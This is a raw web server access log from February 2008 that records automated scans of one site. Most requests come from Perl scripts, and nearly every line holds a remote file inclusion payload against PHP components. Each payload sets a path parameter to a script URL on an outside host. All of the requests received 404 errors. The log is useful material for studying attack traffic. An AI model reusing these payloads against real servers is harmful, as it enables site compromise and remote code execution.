62.168.15.147 - - [24/Feb/2008:06:56:13 -0800] "GET /logs/access_080211.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
62.168.15.147 - - [24/Feb/2008:06:56:13 -0800] "GET /logs/access_080211.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
62.168.15.147 - - [24/Feb/2008:06:56:14 -0800] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
62.168.15.147 - - [24/Feb/2008:06:56:14 -0800] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
62.168.15.147 - - [24/Feb/2008:06:56:14 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
62.168.15.147 - - [24/Feb/2008:06:56:14 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
200.172.90.2 - - [24/Feb/2008:06:57:04 -0800] "GET /logs/access_080114.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://h1.ripway.com/frizza/Mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
200.172.90.2 - - [24/Feb/2008:06:57:06 -0800] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://h1.ripway.com/frizza/Mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
200.172.90.2 - - [24/Feb/2008:06:57:07 -0800] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://h1.ripway.com/frizza/Mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
124.217.247.166 - - [24/Feb/2008:06:57:24 -0800] "GET /logs/access_071210.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
212.241.183.41 - - [24/Feb/2008:06:59:07 -0800] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.toulouseangloexchange.com"
212.241.183.41 - - [24/Feb/2008:06:59:23 -0800] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.toulouseangloexchange.com"
212.241.183.41 - - [24/Feb/2008:07:02:11 -0800] "GET //claroline/phpbb/page_tail.php?includePath=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.toulouseangloexchange.com"
212.241.183.41 - - [24/Feb/2008:07:02:12 -0800] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.toulouseangloexchange.com"
80.82.118.64 - - [24/Feb/2008:07:02:19 -0800] "GET /logs//templates/default/header.inc.php?menu=http://architoshforums.forest.net/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.toulouseangloexchange.com"
80.82.118.64 - - [24/Feb/2008:07:02:19 -0800] "GET //templates/default/header.inc.php?menu=http://architoshforums.forest.net/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.toulouseangloexchange.com"
61.109.245.113 - - [24/Feb/2008:07:03:00 -0800] "GET /logs/access_080114.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
206.220.64.3 - - [24/Feb/2008:07:03:56 -0800] "GET /logs/access_071210.log//faqsupport/samplefaqsupport.php?path[docroot]=http://zmetea.tripod.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
91.121.22.134 - - [24/Feb/2008:07:04:16 -0800] "GET /logs/%3Cwbr%20/%3Eaccess_080127.log//appserv/main.php?appserv_root=http://www.australiada.net/userpics/zwierzeta_motyle/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
91.121.22.134 - - [24/Feb/2008:07:04:16 -0800] "GET //appserv/main.php?appserv_root=http://www.australiada.net/userpics/zwierzeta_motyle/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
91.121.22.134 - - [24/Feb/2008:07:04:16 -0800] "GET /logs/%3Cwbr%20//appserv/main.php?appserv_root=http://www.australiada.net/userpics/zwierzeta_motyle/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
91.121.22.134 - - [24/Feb/2008:07:04:46 -0800] "GET /logs/%3Cwbr%20/%3Eaccess_071126.log//appserv/main.php?appserv_root=http://www.australiada.net/userpics/zwierzeta_motyle/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
70.84.49.42 - - [24/Feb/2008:07:05:23 -0800] "GET /logs/access_080211.log//components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=http://edu-web.eu/adds/main.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
70.84.49.42 - - [24/Feb/2008:07:05:23 -0800] "GET //components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=http://edu-web.eu/adds/main.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
70.84.49.42 - - [24/Feb/2008:07:05:23 -0800] "GET /logs//components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=http://edu-web.eu/adds/main.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
200.172.90.2 - - [24/Feb/2008:07:05:29 -0800] "GET /logs/scripts.log//Neos_Chronos/header.php?base_folder=http://h1.ripway.com/frizza/Mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
200.172.90.2 - - [24/Feb/2008:07:05:30 -0800] "GET //Neos_Chronos/header.php?base_folder=http://h1.ripway.com/frizza/Mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
200.172.90.2 - - [24/Feb/2008:07:05:30 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://h1.ripway.com/frizza/Mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
61.47.60.169 - - [24/Feb/2008:07:06:03 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mrcomp.ru/abf94b32b16c995faf109f731a015c8a/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
61.47.60.169 - - [24/Feb/2008:07:06:03 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mrcomp.ru/abf94b32b16c995faf109f731a015c8a/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
222.255.3.68 - - [24/Feb/2008:07:06:19 -0800] "GET /logs/access_071210.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.fox-forge.biz//includes/com_log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
222.255.3.68 - - [24/Feb/2008:07:06:19 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.fox-forge.biz//includes/com_log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
200.172.90.2 - - [24/Feb/2008:07:07:23 -0800] "GET /logs/access_071112.log//Neos_Chronos/header.php?base_folder=http://h1.ripway.com/frizza/Mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
201.35.66.58 - - [24/Feb/2008:07:07:40 -0800] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
222.255.3.68 - - [24/Feb/2008:07:08:33 -0800] "GET /logs/access_071112.log//skin/zero_vote/error.php?dir=http://www.fox-forge.biz//includes/com_log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
222.255.3.68 - - [24/Feb/2008:07:08:34 -0800] "GET //skin/zero_vote/error.php?dir=http://www.fox-forge.biz//includes/com_log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
222.255.3.68 - - [24/Feb/2008:07:08:35 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.fox-forge.biz//includes/com_log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
222.255.3.68 - - [24/Feb/2008:07:09:06 -0800] "GET /logs/access_071203.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.fox-forge.biz//includes/com_log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
222.255.3.68 - - [24/Feb/2008:07:11:52 -0800] "GET /logs/access_071203.log//skin/zero_vote/error.php?dir=http://www.fox-forge.biz//includes/com_log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
85.17.200.74 - - [24/Feb/2008:07:12:28 -0800] "GET //Neos_Chronos/header.php?base_folder=http://yudz.110mb.com/docs/heer.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
217.17.29.41 - - [24/Feb/2008:07:14:21 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.clanwac.co.uk/tmp/.../.../cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.toulouseangloexchange.com"
217.17.29.41 - - [24/Feb/2008:07:14:21 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.clanwac.co.uk/tmp/.../.../cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.toulouseangloexchange.com"
85.17.200.74 - - [24/Feb/2008:07:15:00 -0800] "GET /logs/%3Cwbr%20/%3Eaccess_071210.log//Neos_Chronos/header.php?base_folder=http://yudz.110mb.com/docs/heer.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
85.17.200.74 - - [24/Feb/2008:07:15:00 -0800] "GET //Neos_Chronos/header.php?base_folder=http://yudz.110mb.com/docs/heer.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
85.17.200.74 - - [24/Feb/2008:07:15:01 -0800] "GET /logs/%3Cwbr%20//Neos_Chronos/header.php?base_folder=http://yudz.110mb.com/docs/heer.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
85.17.200.74 - - [24/Feb/2008:07:15:16 -0800] "GET /logs/%3Cwbr%20/%3Eaccess_080211.log//Neos_Chronos/header.php?base_folder=http://yudz.110mb.com/docs/heer.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
217.27.212.248 - - [24/Feb/2008:07:17:35 -0800] "GET //index.php?option=com_expose&Itemid=&mosConfig_absolute_path=http://www.dva-serdca.de/images/stories/food/indexfile.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
211.233.19.105 - - [24/Feb/2008:07:17:39 -0800] "GET /logs/access.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
211.233.19.105 - - [24/Feb/2008:07:17:39 -0800] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
211.233.19.105 - - [24/Feb/2008:07:17:39 -0800] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
217.27.212.248 - - [24/Feb/2008:07:17:49 -0800] "GET /logs//index.php?option=com_expose&Itemid=&mosConfig_absolute_path=http://www.dva-serdca.de/images/stories/food/indexfile.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
217.27.212.248 - - [24/Feb/2008:07:18:12 -0800] "GET /logs/access_080107.log//index.php?option=com_expose&Itemid=&mosConfig_absolute_path=http://www.dva-serdca.de/images/stories/food/indexfile.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
64.38.19.70 - - [24/Feb/2008:07:18:34 -0800] "GET //include/write.php?dir=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.toulouseangloexchange.com"
64.38.19.70 - - [24/Feb/2008:07:18:35 -0800] "GET /logs//include/write.php?dir=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.toulouseangloexchange.com"
64.38.19.70 - - [24/Feb/2008:07:18:35 -0800] "GET //include/write.php?dir=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.toulouseangloexchange.com"
64.38.19.70 - - [24/Feb/2008:07:18:35 -0800] "GET //include/write.php?dir=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.toulouseangloexchange.com"
64.38.19.70 - - [24/Feb/2008:07:18:35 -0800] "GET /logs//include/write.php?dir=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.toulouseangloexchange.com"
64.38.19.70 - - [24/Feb/2008:07:18:35 -0800] "GET /logs//include/write.php?dir=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.toulouseangloexchange.com"
217.27.212.248 - - [24/Feb/2008:07:19:49 -0800] "GET /logs/access_071119.log//index.php?option=com_expose&Itemid=&mosConfig_absolute_path=http://www.dva-serdca.de/images/stories/food/indexfile.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
61.14.187.140 - - [24/Feb/2008:07:20:03 -0800] "GET //include/write.php?dir=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.toulouseangloexchange.com"
61.14.187.140 - - [24/Feb/2008:07:20:03 -0800] "GET /logs//include/write.php?dir=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.toulouseangloexchange.com"
61.14.187.140 - - [24/Feb/2008:07:20:03 -0800] "GET //include/write.php?dir=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.toulouseangloexchange.com"
61.14.187.140 - - [24/Feb/2008:07:20:03 -0800] "GET /logs//include/write.php?dir=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.toulouseangloexchange.com"
218.189.208.72 - - [24/Feb/2008:07:20:03 -0800] "GET /logs//include/write.php?dir=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.toulouseangloexchange.com"
218.189.208.72 - - [24/Feb/2008:07:20:04 -0800] "GET //include/write.php?dir=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.toulouseangloexchange.com"
61.14.187.140 - - [24/Feb/2008:07:20:04 -0800] "GET /logs//include/write.php?dir=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
61.14.187.140 - - [24/Feb/2008:07:20:04 -0800] "GET //include/write.php?dir=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
218.189.208.72 - - [24/Feb/2008:07:20:04 -0800] "GET /logs//include/write.php?dir=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.toulouseangloexchange.com"
218.189.208.72 - - [24/Feb/2008:07:20:04 -0800] "GET //include/write.php?dir=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.toulouseangloexchange.com"
218.189.208.72 - - [24/Feb/2008:07:20:05 -0800] "GET /logs//include/write.php?dir=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.toulouseangloexchange.com"
218.189.208.72 - - [24/Feb/2008:07:20:05 -0800] "GET //include/write.php?dir=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.toulouseangloexchange.com"
211.234.116.170 - - [24/Feb/2008:07:20:45 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.toulouseangloexchange.com"
211.234.116.170 - - [24/Feb/2008:07:20:45 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.toulouseangloexchange.com"
61.14.187.140 - - [24/Feb/2008:07:20:59 -0800] "GET //include/write.php?dir=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.toulouseangloexchange.com"
61.14.187.140 - - [24/Feb/2008:07:20:59 -0800] "GET /logs//include/write.php?dir=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.toulouseangloexchange.com"
61.14.187.140 - - [24/Feb/2008:07:21:00 -0800] "GET //include/write.php?dir=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.toulouseangloexchange.com"
61.14.187.140 - - [24/Feb/2008:07:21:00 -0800] "GET /logs//include/write.php?dir=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.toulouseangloexchange.com"
61.14.187.140 - - [24/Feb/2008:07:21:00 -0800] "GET //include/write.php?dir=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.toulouseangloexchange.com"
61.14.187.140 - - [24/Feb/2008:07:21:00 -0800] "GET /logs//include/write.php?dir=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.toulouseangloexchange.com"
61.218.51.165 - - [24/Feb/2008:07:21:02 -0800] "GET /logs/access_080211.log//components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
61.218.51.165 - - [24/Feb/2008:07:21:03 -0800] "GET //components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
61.218.51.165 - - [24/Feb/2008:07:21:05 -0800] "GET /logs//components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
69.93.162.92 - - [24/Feb/2008:07:23:22 -0800] "GET //appserv/main.php?appserv_root=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.toulouseangloexchange.com"
69.93.162.92 - - [24/Feb/2008:07:23:22 -0800] "GET /logs//appserv/main.php?appserv_root=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.toulouseangloexchange.com"
158.36.103.2 - - [24/Feb/2008:07:24:03 -0800] "GET //include/write.php?dir=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.toulouseangloexchange.com"
158.36.103.2 - - [24/Feb/2008:07:24:03 -0800] "GET /logs//include/write.php?dir=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.toulouseangloexchange.com"
158.36.103.2 - - [24/Feb/2008:07:24:03 -0800] "GET //include/write.php?dir=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.toulouseangloexchange.com"
158.36.103.2 - - [24/Feb/2008:07:24:03 -0800] "GET /logs//include/write.php?dir=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.toulouseangloexchange.com"
158.36.103.2 - - [24/Feb/2008:07:24:03 -0800] "GET //include/write.php?dir=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.toulouseangloexchange.com"
158.36.103.2 - - [24/Feb/2008:07:24:03 -0800] "GET /logs//include/write.php?dir=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.toulouseangloexchange.com"
211.233.19.105 - - [24/Feb/2008:07:24:32 -0800] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
211.234.116.170 - - [24/Feb/2008:07:24:33 -0800] "GET /logs/access_071210.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/ntchack/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
211.233.19.105 - - [24/Feb/2008:07:24:33 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
211.234.116.170 - - [24/Feb/2008:07:24:33 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/ntchack/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
211.233.19.105 - - [24/Feb/2008:07:24:33 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
211.234.116.170 - - [24/Feb/2008:07:24:33 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/ntchack/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
89.111.176.57 - - [24/Feb/2008:07:24:35 -0800] "GET /index.php?product=http://scanbax.we.bs/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
87.101.240.7 - - [24/Feb/2008:07:28:10 -0800] "GET //include/write.php?dir=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.toulouseangloexchange.com"
87.101.240.6 - - [24/Feb/2008:07:28:11 -0800] "GET /logs//include/write.php?dir=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.toulouseangloexchange.com"
193.108.185.222 - - [24/Feb/2008:07:29:07 -0800] "GET /logs/access_080114.log//faqsupport/samplefaqsupport.php?path[docroot]=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
193.108.185.222 - - [24/Feb/2008:07:29:11 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
193.108.185.222 - - [24/Feb/2008:07:29:14 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
211.234.116.170 - - [24/Feb/2008:07:30:10 -0800] "GET /logs/access_071022.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/ntchack/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
